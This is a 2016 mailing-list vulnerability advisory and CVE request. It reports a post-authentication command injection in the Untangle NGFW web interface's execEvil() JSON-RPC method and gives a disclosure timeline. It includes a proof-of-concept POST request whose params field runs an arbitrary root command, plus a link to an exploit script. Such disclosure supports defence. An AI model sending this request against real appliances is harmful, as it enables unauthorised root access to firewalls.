Bugtraq mailing list archives

Previous By Date Next
Previous By Thread Next

[fd] CVE ID request: Untangle NGFW <= v12.1.0 post-auth command injection

From: Matt Bush <matt () 3xocyte net>
Date: Mon, 27 Jun 2016 17:36:11 +1000 (AEST)
Product: 

https://www.untangle.com/untangle-ng-firewall/

Description:

CWE-77: Improper Neutralization of Special Elements used in a Command ('Command Injection') 

The Untangle NGFW <= 12.1.0 web interface is prone to a command injection vulnerability, allowing non-root users to 
execute arbitrary commands with root privileges and gain remote shell access to the appliance. 

This vulnerability can be triggered via modifying any request made via functionality accessible from the 
Network->Troubleshooting->Network Tests window using an intercepting proxy or with otherwise crafted requests to abuse 
the execEvil() function.

The appliance web interface is accessible via unsecured HTTP by default. This leaves the appliance vulnerable to 
Man-in-the-Middle attacks that allow attackers to intercept plaintext credentials, facilitating exploitation of this 
vulnerability for further elevation of privileges.

Solution:

No official solution is currently available. Restrict access, consider Administrator interface access equivalent to 
root privileges.

Vulnerability Discovery:
Matthew Bush (The Missing Link)

Proof of Concept:
With a local intercepting proxy, alter the "params" field for any POST request to execEvil to execute any arbitrary 
command (eg, using the Ping Test) once logged in and assigned a nonce value for the session:

---

POST http://192.168.68.154/webui/JSON-RPC HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Content-Type: text/plain
Content-Length: 99
Cookie: JSESSIONID=3C6A2963EFB628FA83AF6B6563222C6F; pysid=ce0629f79bd506f9543381e7eb7d7b7a
Connection: keep-alive
Host: 192.168.68.154

{"id":5,"nonce":"fbejsu4c77toq8a5igr1320i2p","method":".obj#2082962752.execEvil","params":["id"]}

---

Exploit:
https://github.com/3xocyte/Exploits/blob/master/untangle-ngfw-12.1-ci.py

Disclosure Timeline:
22/4/2016                       Attempted to contact vendor after discovery of vulnerabilities
6/5/2016                        No response from vendor, vulnerabilities reported to US-CERT (assigned VU#538103)
12/5/2016                       US-CERT confirms contacting vendor
16/6/2016                       US-CERT notifies of no response from vendor, suggested requesting CVE-ID via mailing 
list
27/6/2016                       Public disclosure

Discovery Credit:
Matt Bush (@3xocyte)
The Missing Link (Sydney, Australia)
Previous By Date Next
Previous By Thread Next

Current thread: